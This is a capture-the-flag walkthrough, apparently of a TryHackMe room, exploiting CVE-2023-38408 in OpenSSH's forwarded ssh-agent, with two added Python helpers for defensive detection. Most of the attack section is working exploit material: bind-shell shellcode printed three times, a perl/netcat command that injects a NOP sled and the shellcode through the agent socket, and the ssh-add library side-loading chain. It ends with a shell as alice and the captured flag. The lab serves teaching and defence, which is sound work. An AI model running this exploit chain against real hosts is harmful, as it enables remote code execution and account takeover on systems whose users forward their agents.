NIST assigned the CVE identifier CVE-2023-38408 on July 19th in response to a critical vulnerability in OpenSSH's PKCS#11 feature prior to version 9.3p2. This flaw, which allows remote code execution when an agent is forwarded to an attacker-controlled system, is caused by an insufficiently trustworthy search path and was discovered by the Qualys Threat Research Unit (TRU). It is essential to note that loading code from /usr/lib into ssh-agent can pose significant risks. The vulnerability is an incomplete fix for the earlier CVE-2016-10009.
The vulnerability affects all OpenSSH versions before 9.3p2, posing substantial risk to users who rely on agent forwarding in untrusted environments. To guard against remote code execution, it is strongly advised to upgrade to OpenSSH version 9.3p2 or later.
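As an added defender-side check that is not part of the room: a small Python helper that flags an OpenSSH banner older than the 9.3p2 fix named above and lists the ssh_config blocks that turn on ForwardAgent, the setting the attack depends on. The sample ssh_config is constructed for the demonstration.

```python
import re

# Fix version named in the text: OpenSSH 9.3p2 (major, minor, portable patch level).
FIXED_VERSION = (9, 3, 2)

_VERSION_RE = re.compile(r"OpenSSH_(\d+)\.(\d+)(?:p(\d+))?")

def parse_openssh_version(banner):
    """Extract (major, minor, patch) from an `ssh -V` line or an SSH server
    identification string such as 'SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1'.
    A banner without a 'pN' suffix (non-portable OpenBSD builds) is treated
    as patch level 0. Returns None when no OpenSSH version is present."""
    m = _VERSION_RE.search(banner)
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))

def is_vulnerable_version(banner):
    """True when the banner reports a release older than 9.3p2.
    Caveat: distributions often backport the fix without changing the upstream
    version string, so a True result is a prompt to check the package
    changelog, not proof of exposure."""
    version = parse_openssh_version(banner)
    if version is None:
        raise ValueError("no OpenSSH version in banner: %r" % banner)
    return version < FIXED_VERSION

def agent_forwarding_hosts(ssh_config_text):
    """Return the Host/Match blocks of an ssh_config that set ForwardAgent yes.
    Keywords are case-insensitive, 'Key=Value' is accepted and '#' comments are
    ignored, as in ssh_config(5). Settings before the first Host/Match block
    apply globally and are reported as '*'."""
    enabled = []
    current = "*"
    for raw in ssh_config_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.replace("=", " ", 1).split(None, 1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key in ("host", "match"):
            current = value
        elif key == "forwardagent" and value.lower() == "yes":
            enabled.append(current)
    return enabled

# Constructed sample ssh_config used for the demonstration below.
SAMPLE_SSH_CONFIG = """\
Host *
    ForwardAgent no
Host jump.example
    ForwardAgent yes   # forwarded to a host that is not fully trusted
Host legacy
    forwardagent=yes
"""

if __name__ == "__main__":
    for banner in ("OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "OpenSSH_9.3p2", "SSH-2.0-OpenSSH_9.4"):
        print(banner, "-> vulnerable version" if is_vulnerable_version(banner) else "-> fixed")
    print("hosts with ForwardAgent yes:", agent_forwarding_hosts(SAMPLE_SSH_CONFIG))
```

Version strings alone miss distribution backports, so treat a hit as a prompt to check the package changelog; ForwardAgent is worth restricting to hosts you fully trust regardless of version.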
To deploy the attached VM, press the green Start Machine button at the top of the task and connect to the machine via SSH using the following credentials:
Username: redqueenrebel
Password: DownTheRabbitHole!
Answer the questions below
Let’s get started!
Initially, ssh-agent allowed loading any shared library without filtering, leading to security concerns. In response to CVE-2016-10009, an allow-list (/usr/lib*/,/usr/local/lib/ by default) was added to limit library loading. However, it is possible to abuse the side effects of a library's constructors (run on dlopen) and destructors (run on dlclose) to manipulate memory and control the program flow.
Code execution can be achieved by making the stack executable, registering a signal handler for SIGSEGV, replacing that handler's code with code from another library, and finally triggering a SIGSEGV so that the replaced handler jumps into the stack where the shellcode is stored.
The following paragraphs present the detailed steps:
- Making the Stack Executable:
Leveraging dlopen() to load one of the libraries grants the ability to make the stack memory region (specifically the stack of the target process, ssh-pkcs11-helper) executable. This bypasses the usual protection against executing code on the stack.
- Copying the Shellcode to the Stack:
Once the shellcode is generated, typically using tools like Metasploit, it can be copied to the stack memory using the socket created by the SSH connection. The shellcode is combined with a NOP sled, a sequence of No-Operation assembly instructions, which provides a larger target for the program's execution flow to land on during the gadget execution.
To verify whether the process has the desired executable flag, you can use the following commands in gdb, the GNU debugger. You can repeat the next few gdb commands once you have gained access as alice:
- First, obtain the PID of the process ssh-pkcs11-helper.
- Attach gdb to the target process using its PID.
- Use the command info proc mappings to examine the memory mappings of the process.
- Look for the memory region corresponding to the stack and check its flags, which should be marked rwx.
Terminal
alice@workstation:~$ ps -aux | grep pkcs11-helper
alice       1522  0.0  0.2   7788  5520 ?        S    09:22   0:00 /usr/lib/openssh/ssh-pkcs11-helper
alice@workstation:~$ sudo gdb -p 1522
[snip]
29      ../sysdeps/unix/sysv/linux/poll.c: No such file or directory.
(gdb) info proc mappings
process 1522
Mapped address spaces:
          Start Addr           End Addr       Size     Offset Perms objfile
[snip]
      0x7ffc7a83b000     0x7ffc7a85c000    0x21000        0x0 rwxp  [stack]
      0x7ffc7a9df000     0x7ffc7a9e3000     0x4000        0x0 r--p  [vvar]
      0x7ffc7a9e3000     0x7ffc7a9e5000     0x2000        0x0 r-xp  [vdso]
  0xffffffffff600000 0xffffffffff601000     0x1000        0x0 --xp
[snip]
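The same rwx check can be run outside gdb by reading /proc/<pid>/maps. The Python below is an added example, not part of the room: it parses maps lines, reports any region mapped both writable and executable, and can scan live ssh-pkcs11-helper and ssh-agent processes (scan_processes, which needs root to read another user's maps). The sample maps text is constructed to mirror the gdb output above.

```python
import os
import re
from collections import namedtuple

# One /proc/<pid>/maps line: start-end perms offset dev inode [pathname]
_MAPS_RE = re.compile(r"^(?P<start>[0-9a-f]+)-(?P<end>[0-9a-f]+)\s+(?P<perms>[rwxps-]{4})"
                      r"\s+[0-9a-f]+\s+\S+\s+\d+\s*(?P<path>.*)$")

Mapping = namedtuple("Mapping", "start end perms path")

def parse_maps(text):
    """Parse the text of /proc/<pid>/maps into Mapping records."""
    mappings = []
    for line in text.splitlines():
        m = _MAPS_RE.match(line.strip())
        if m:
            mappings.append(Mapping(int(m["start"], 16), int(m["end"], 16),
                                    m["perms"], m["path"].strip()))
    return mappings

def writable_executable(mappings):
    """Regions mapped both writable and executable. A healthy ssh-pkcs11-helper
    has none; an rwx [stack] is exactly what the gdb check above looks for."""
    return [m for m in mappings if "w" in m.perms and "x" in m.perms]

def executable_stack(mappings):
    """True when the main-thread stack carries the x permission bit."""
    return any(m.path == "[stack]" and "x" in m.perms for m in mappings)

def scan_processes(names=("ssh-pkcs11-helper", "ssh-agent")):
    """Live scan: {pid: [w+x mappings]} for the named processes. The kernel
    truncates /proc/<pid>/comm to 15 chars, so names are compared truncated.
    Reading another user's maps needs root, hence the room's 'sudo gdb'."""
    findings = {}
    wanted = {n[:15] for n in names}
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open(f"/proc/{pid}/comm") as f:
                if f.read().strip() not in wanted:
                    continue
            with open(f"/proc/{pid}/maps") as f:
                wx = writable_executable(parse_maps(f.read()))
        except OSError:
            continue  # process exited, or no permission to read its maps
        if wx:
            findings[int(pid)] = wx
    return findings

# Constructed sample modelled on the gdb 'info proc mappings' output above.
SAMPLE_MAPS = """\
5592d1c00000-5592d1c08000 r--p 00000000 08:01 1234  /usr/lib/openssh/ssh-pkcs11-helper
5592d1c08000-5592d1c20000 r-xp 00008000 08:01 1234  /usr/lib/openssh/ssh-pkcs11-helper
7ffc7a83b000-7ffc7a85c000 rwxp 00000000 00:00 0     [stack]
7ffc7a9df000-7ffc7a9e3000 r--p 00000000 00:00 0     [vvar]
7ffc7a9e3000-7ffc7a9e5000 r-xp 00000000 00:00 0     [vdso]
"""

if __name__ == "__main__":
    for m in writable_executable(parse_maps(SAMPLE_MAPS)):
        print(f"w+x region {m.start:#x}-{m.end:#x} ({m.end - m.start:#x} bytes) {m.path}")
```

On a clean system writable_executable() returns an empty list for both processes; a non-empty result for ssh-pkcs11-helper is a strong indicator worth investigating.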
Using gdb, you can verify whether the stack has the shellcode loaded by inspecting its content.
The expression $rsp+10100 references a specific memory location relative to the stack pointer ($rsp): it points to the address 10100 bytes above the stack pointer.
Observe that it contains a series of NOP (No Operation) instructions (0x90) followed by the start of the shellcode: 0x48 0x31 0xc0 0x48 0x31 0xff 0x48
Terminal
(gdb) x/100xgb $rsp+10100
0x7ffc7a85994c: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0x7ffc7a859954: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0x7ffc7a85995c: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0x7ffc7a859964: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0x7ffc7a85996c: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0x7ffc7a859974: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0x7ffc7a85997c: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0x7ffc7a859984: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0x7ffc7a85998c: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0x7ffc7a859994: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0x7ffc7a85999c: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0x7ffc7a8599a4: 0x90 0x90 0x90 0x90 0x90 0x48 0x31 0xc0
0x7ffc7a8599ac: 0x48 0x31 0xff 0x48
- Registering a Signal Handler:
To successfully execute arbitrary code within the exploit, a custom signal handler must be registered for the SIGSEGV signal. This signal, known as a Segmentation Fault, is raised when a program attempts to access an invalid memory address. By registering the signal handler, the exploit defines a user-defined function that is executed whenever SIGSEGV occurs.
- Replacing the Signal Handler's Code:
At this stage, the exploit side-loads another library to replace the current signal handler's code with an alternative code segment that jumps to the stack where the shellcode is stored.
To ensure that the code segments of this new library remain mapped in memory even after dlclose() is invoked, the library must be marked with the "Nodelete" attribute (the DF_1_NODELETE flag in its dynamic section). Ordinarily, when dlclose() is called to close a shared library, the library's code segments are unloaded from memory and any associated resources are released. With the "Nodelete" attribute, however, the attacker prevents the code segments from being unloaded, preserving them in memory beyond the dlclose() operation. This ensures that the replacement code, responsible for jumping to the shellcode on the stack, remains accessible throughout the exploit's execution.
- Triggering SIGSEGV:
By employing yet another library, the attacker intentionally triggers a SIGSEGV signal, which prompts the kernel to execute the custom signal handler registered earlier. This step is a critical part of the exploit's progression.
Upon receiving the SIGSEGV signal, the kernel recognizes that an invalid memory access has occurred and invokes the custom signal handler rather than terminating the program. The attacker thereby redirects the program's execution toward the injected code located within the NOP sled.
- Executing the Replacement Code:
By achieving this precise jump into the executable stack, the exploit ensures that the program's execution is directed to the memory location where the shellcode resides.
Answer the questions below
┌──(witty㉿kali)-[~/Downloads]
└─$ ssh redqueenrebel@10.10.159.56
redqueenrebel@workstation:~$ id;ls;ifconfig
uid=1002(redqueenrebel) gid=1002(redqueenrebel) groups=1002(redqueenrebel)
snap
Command 'ifconfig' not found, but can be installed with:
apt install net-tools
Please ask your administrator.
redqueenrebel@workstation:/home$ ls
alice redqueenrebel workstation
redqueenrebel@workstation:/home$
redqueenrebel@workstation:/home$ cd alice
-bash: cd: alice: Permission denied
redqueenrebel@workstation:/home$ sudo -l
[sudo] password for redqueenrebel:
Sorry, user redqueenrebel may not run sudo on workstation.
Let’s keep going!
Your objective will be to escalate privileges and compromise the "alice" account. Using the AttackBox rather than your own VM is highly recommended, since you will be allowing any user holding alice's SSH key to access your machine, and the AttackBox already has the software needed for the exploitation installed.
To get started, you need to set up the environment in which your AttackBox acts as the attacker's box. Please note that the following steps are not necessary in a real-world environment and are specific to this vulnerable machine.
Step 1: Add Alice's Public Key
Clear your SSH sessions by using: rm -rf /tmp/ssh*
On your AttackBox, add Alice's public key to the authorized_keys file.
AttackBox Terminal
echo "ssh-rsa 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 alice@workstation" >> /root/.ssh/authorized_keys
Step 2: Create the IP File
Next, create a file named /tmp/ip.txt on your VM instance (the vulnerable machine). Inside this file, write your AttackBox's IP address as its content.
So, for instance, if your AttackBox's IP is 10.10.10.10 you will have to run the following:
Workstation Terminal
redqueenrebel@workstation:~# echo "10.10.10.10" > /tmp/ip.txt
Step 3: Wait for Connection
At this point, your vulnerable machine should receive, within a minute, a connection from your AttackBox.
You can now use this connection to attempt to obtain the flag by leveraging your privileges! Get ready for an adventure, as you start digging down the rabbit hole into the depths of this CVE.
Answer the questions below
redqueenrebel@workstation:/tmp$ rm -rf /tmp/ssh*
┌──(root㉿kali)-[~/.ssh]
└─# echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCs4FT0kCeBfQ1co/PeApZn3NmZ68mUwEEbtP598IcBBDgpe+AauGtOVNxsptmZD26yjhTXp4RJgrreUgPJQ8ICDUvASD/2W8GOl5XpYddbrcHy+djyViQV/69VskB2Y9LCobbkYPBUjIKlObqgamM7HhcNO3Zu65AAtbu+31+N+swygYjTRB37cjQOLgI7FM9nmuhyb8uSMtttTJRD7ybXPfiHV8YxLENuJU0BGggc9i/hXKQKwhEvnliiqw/XdpK/JyT6t65DFvYYkT21bPHpBDMNzPauUgr2yagKMFNe8HFQfk/QibTcLMeV0JmCGeOcv8oJP/T4xJnnoetMvZGEPZ4hXH7E3n2wksLjuF2se61/c+SIh6Zm+gUYQESTAmmbRPeTj7RcZPRN22knpSyu76eZKBf/dmHYXQlIk1gKsouFdposOpxYRJ4Wt97uEPihW/wzzT+QPcLyYoGpbFXJmpqNaOBVJw1n0KqB98dL5Ixa32FKTCzaBPHkDmK/I2M= alice@workstation" >> /root/.ssh/authorized_keys
┌──(root㉿kali)-[~/.ssh]
└─# ls
authorized_keys known_hosts known_hosts.old
┌──(root㉿kali)-[~/.ssh]
└─# cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCs4FT0kCeBfQ1co/PeApZn3NmZ68mUwEEbtP598IcBBDgpe+AauGtOVNxsptmZD26yjhTXp4RJgrreUgPJQ8ICDUvASD/2W8GOl5XpYddbrcHy+djyViQV/69VskB2Y9LCobbkYPBUjIKlObqgamM7HhcNO3Zu65AAtbu+31+N+swygYjTRB37cjQOLgI7FM9nmuhyb8uSMtttTJRD7ybXPfiHV8YxLENuJU0BGggc9i/hXKQKwhEvnliiqw/XdpK/JyT6t65DFvYYkT21bPHpBDMNzPauUgr2yagKMFNe8HFQfk/QibTcLMeV0JmCGeOcv8oJP/T4xJnnoetMvZGEPZ4hXH7E3n2wksLjuF2se61/c+SIh6Zm+gUYQESTAmmbRPeTj7RcZPRN22knpSyu76eZKBf/dmHYXQlIk1gKsouFdposOpxYRJ4Wt97uEPihW/wzzT+QPcLyYoGpbFXJmpqNaOBVJw1n0KqB98dL5Ixa32FKTCzaBPHkDmK/I2M= alice@workstation
redqueenrebel@workstation:~$ echo "10.8.19.103" > /tmp/ip.txt
redqueenrebel@workstation:/tmp$ cat /etc/passwd | grep "\/home"
syslog:x:104:111::/home/syslog:/usr/sbin/nologin
cups-pk-helper:x:115:122:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
workstation:x:1000:1000:workstation,,,:/home/workstation:/bin/bash
alice:x:1001:1001:,,,:/home/alice:/bin/bash
redqueenrebel:x:1002:1002:,,,:/home/redqueenrebel:/bin/bash
Be ready for the exploitation!
In this task, we will run the exploit and gain a more practical understanding of how it works.
For this scenario, we will be working with two machines: the workstation (a vulnerable instance of Ubuntu 21.04) and another server under the attacker's control (the AttackBox). To simulate the vulnerable setup, a connection between the workstation and the server was established in the previous task. The user alice is connected from the workstation to the attacker's machine using SSH agent forwarding. Alice does this by executing the following commands (so you do not have to):
Example Terminal
alice@workstation:~$ eval `ssh-agent -s`
Agent pid 1286
alice@workstation ~ [SIGINT]> ssh root@10.10.157.249 -A
Exploitation:
At this stage, several libraries can be side-loaded. It's important to note that the ssh-add commands are issued from the attacker's control box, but the libraries are loaded, and their side effects take place, on the target workstation.
In order to execute the shellcode within the vulnerable process (ssh-pkcs11-helper), it is crucial that the stack of that process is flagged as executable:
AttackBox Terminal
root@attacker:~# echo /tmp/ssh-*/agent.*
/tmp/ssh-NqLP6il36s/agent.3452
root@attacker:~# export SSH_AUTH_SOCK=/tmp/ssh-NqLP6il36s/agent.3452
root@attacker:~# ssh-add -s /usr/lib/systemd/boot/efi/linuxx64.elf.stub
Enter passphrase for PKCS#11:
Could not add card "/usr/lib/systemd/boot/efi/linuxx64.elf.stub": agent refused operation
To copy the shellcode into the process using the SSH socket, you need to follow these steps:
- Obtain the PID of the SSH agent running on the remote attacker machine.
- Once you have the socket, use netcat (nc) to transfer the shellcode to the agent's memory (on the workstation).
- After starting the transfer, wait for a few seconds to ensure the shellcode is fully copied into the target memory.
- Finally, press Ctrl-C to stop the netcat transfer once the shellcode is successfully placed in the agent's memory.
Note that the next command does not use ssh-add, because the malicious payload is a passphrase of around 10 KB and ssh-add limits the passphrase to 1 KB.
AttackBox Terminal
root@attacker:~# SHELLCODE=$'\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0\x4d\x31\xd2\x41\x52\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x7a\x69\x48\x89\xe6\x41\x50\x5f\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x41\x50\x5f\x6a\x01\x5e\x6a\x32\x58\x0f\x05\x48\x89\xe6\x48\x31\xc9\xb1\x10\x51\x48\x89\xe2\x41\x50\x5f\x6a\x2b\x58\x0f\x05\x59\x4d\x31\xc9\x49\x89\xc1\x4c\x89\xcf\x48\x31\xf6\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05'
root@attacker:~# (perl -e 'print "\0\0\x27\xbf\x14\0\0\0\x10/usr/lib/modules\0\0\x27\xa6" . "\x90" x 10000'; echo -n "$ SHELLCODE") | nc -U "$SSH_AUTH_SOCK"
^C
The next step in the exploitation process is to register the signal handler for the Segmentation Fault (SIGSEGV) signal.
AttackBox Terminal
root@attacker:~# ssh-add -s /usr/lib/titan/libttcn3-rt2-dynamic.so
Enter passphrase for PKCS#11:
Could not add card "/usr/lib/titan/libttcn3-rt2-dynamic.so": agent refused operation
After successfully registering the custom signal handler for SIGSEGV, the next crucial step in the exploitation process is to replace the original signal handler routine with a carefully chosen gadget. This gadget serves to redirect the program's execution flow and jump into the stack when the SIGSEGV signal is triggered.
AttackBox Terminal
root@attacker:~# ssh-add -s /usr/lib/x86_64-linux-gnu/libKF5SonnetUi.so.5.92.0
Enter passphrase for PKCS#11:
Could not add card "/usr/lib/x86_64-linux-gnu/libKF5SonnetUi.so.5.92.0": agent refused operation
Finally, by intentionally causing a segmentation fault, the SIGSEGV event can be triggered, executing the shellcode:
AttackBox Terminal
root@attacker:~# ssh-add -s /usr/lib/x86_64-linux-gnu/libns3.35-wave.so.0.0.0
Enter passphrase for PKCS#11:
With the exploitation successfully executed, an attacker may gain access to a bind shell (shellcode), which can be accessed using netcat.
Workstation Terminal
redqueenrebel@workstation ~/> nc localhost 31337
whoami
alice
Remember, curiosity and perseverance may just be the key to unlocking the flag!
If you make a mistake along the way and feel lost in wonderland, clear your SSH sessions from /tmp on the AttackBox and, on the vulnerable machine, write the AttackBox's IP to the /tmp/ip.txt file again.
Answer the questions below
https://www.qualys.com/2023/07/19/cve-2023-38408/rce-openssh-forwarded-ssh-agent.txt
┌──(root㉿kali)-[/tmp]
└─# rm -rf /tmp/ssh*
redqueenrebel@workstation:/tmp$ echo "10.8.19.103" > /tmp/ip.txt
┌──(root㉿kali)-[/tmp]
└─# echo /tmp/ssh-*/agent.*
/tmp/ssh-XXXXkjn0Ld/agent.756232
┌──(root㉿kali)-[/tmp]
└─# export SSH_AUTH_SOCK=/tmp/ssh-XXXXkjn0Ld/agent.756232
┌──(root㉿kali)-[/tmp]
└─# ssh-add -s /usr/lib/systemd/boot/efi/linuxx64.elf.stub
Enter passphrase for PKCS#11:
Could not add card "/usr/lib/systemd/boot/efi/linuxx64.elf.stub": agent refused operation
┌──(root㉿kali)-[/tmp]
└─# SHELLCODE=$'\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0\x4d\x31\xd2\x41\x52\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x7a\x69\x48\x89\xe6\x41\x50\x5f\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x41\x50\x5f\x6a\x01\x5e\x6a\x32\x58\x0f\x05\x48\x89\xe6\x48\x31\xc9\xb1\x10\x51\x48\x89\xe2\x41\x50\x5f\x6a\x2b\x58\x0f\x05\x59\x4d\x31\xc9\x49\x89\xc1\x4c\x89\xcf\x48\x31\xf6\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05'
┌──(root㉿kali)-[/home/witty/Downloads]
└─# (perl -e 'print "\0\0\x27\xbf\x14\0\0\0\x10/usr/lib/modules\0\0\x27\xa6" . "\x90" x 10000'; echo -n "$ SHELLCODE") | ncat -U "$SSH_AUTH_SOCK"
┌──(root㉿kali)-[/home/witty/Downloads]
└─# ssh-add -s /usr/lib/titan/libttcn3-rt2-dynamic.so
Enter passphrase for PKCS#11:
Could not add card "/usr/lib/titan/libttcn3-rt2-dynamic.so": agent refused operation
┌──(root㉿kali)-[/home/witty/Downloads]
└─# ssh-add -s /usr/lib/x86_64-linux-gnu/libKF5SonnetUi.so.5.92.0
Enter passphrase for PKCS#11:
Could not add card "/usr/lib/x86_64-linux-gnu/libKF5SonnetUi.so.5.92.0": agent refused operation
Using the AttackBox:
root@ip-10-10-255-117:~# echo "ssh-rsa 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 alice@workstation" >> /root/.ssh/authorized_keys
redqueenrebel@workstation:~$ echo "10.10.255.117" > /tmp/ip.txt
root@ip-10-10-255-117:/tmp# echo /tmp/ssh-*/agent.*
/tmp/ssh-jhyvTxk9ORuS/agent.1400 /tmp/ssh-mRRV0jWeQE/agent.2754
root@ip-10-10-255-117:/tmp# export SSH_AUTH_SOCK=/tmp/ssh-jhyvTxk9ORuS/agent.1400
root@ip-10-10-255-117:/tmp# ssh-add -s /usr/lib/systemd/boot/efi/linuxx64.elf.stub
Enter passphrase for PKCS#11:
Could not add card "/usr/lib/systemd/boot/efi/linuxx64.elf.stub": agent refused operation
root@ip-10-10-255-117:/tmp# SHELLCODE=$'\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0\x4d\x31\xd2\x41\x52\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x7a\x69\x48\x89\xe6\x41\x50\x5f\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x41\x50\x5f\x6a\x01\x5e\x6a\x32\x58\x0f\x05\x48\x89\xe6\x48\x31\xc9\xb1\x10\x51\x48\x89\xe2\x41\x50\x5f\x6a\x2b\x58\x0f\x05\x59\x4d\x31\xc9\x49\x89\xc1\x4c\x89\xcf\x48\x31\xf6\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05'
root@ip-10-10-255-117:/tmp# (perl -e 'print "\0\0\x27\xbf\x14\0\0\0\x10/usr/lib/modules\0\0\x27\xa6" . "\x90" x 10000'; echo -n "$ SHELLCODE") | nc -U "$SSH_AUTH_SOCK"
^C
root@ip-10-10-124-131:/tmp# ssh-add -s /usr/lib/titan/libttcn3-rt2-dynamic.so
Enter passphrase for PKCS#11:
Could not add card "/usr/lib/titan/libttcn3-rt2-dynamic.so": agent refused operation
root@ip-10-10-124-131:/tmp# ssh-add -s /usr/lib/x86_64-linux-gnu/libKF5SonnetUi.so.5.92.0
Enter passphrase for PKCS#11:
Could not add card "/usr/lib/x86_64-linux-gnu/libKF5SonnetUi.so.5.92.0": agent refused operation
root@ip-10-10-124-131:/tmp# ssh-add -s /usr/lib/x86_64-linux-gnu/libns3.35-wave.so.0.0.0
Enter passphrase for PKCS#11:
Could not add card "/usr/lib/x86_64-linux-gnu/libns3.35-wave.so.0.0.0": agent refused operation
redqueenrebel@workstation:/tmp$ nc localhost 31337
whoami
alice
ls
bin
boot
cdrom
dev
etc
home
lib
lib32
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
snap
srv
swapfile
sys
tmp
usr
var
cd /home/alice
ls
Desktop
Documents
Downloads
Music
Pictures
Public
Templates
Videos
nohup.out
snap
cd Desktop
ls
flag.txt
cat flag.txt
THM{CURIOUS_ALICE_LEARNED_NO_WONDERLAND_FOR_HACKERS}
What is the alice flag.txt?
THM{CURIOUS_ALICE_LEARNED_NO_WONDERLAND_FOR_HACKERS}
"Secure like Mad Hatter's tea party."
Finally, the take-home message from CVE-2023-38408 and its advanced exploitation is that even something patched and believed secure may still be vulnerable.
Our analysis showed the necessity of carefully filtering shared libraries and avoiding dangerous side effects, especially in privileged programs like ssh-agent. The exploit's complexity highlights the importance of safe coding practices, comprehensive testing, and continuous monitoring to detect and neutralize threats.
This exploit also highlights the complexity of modern cyber security concerns, as exploit authors are continuously looking for new ways to breach defenses.
Answer the questions below
Finished the room!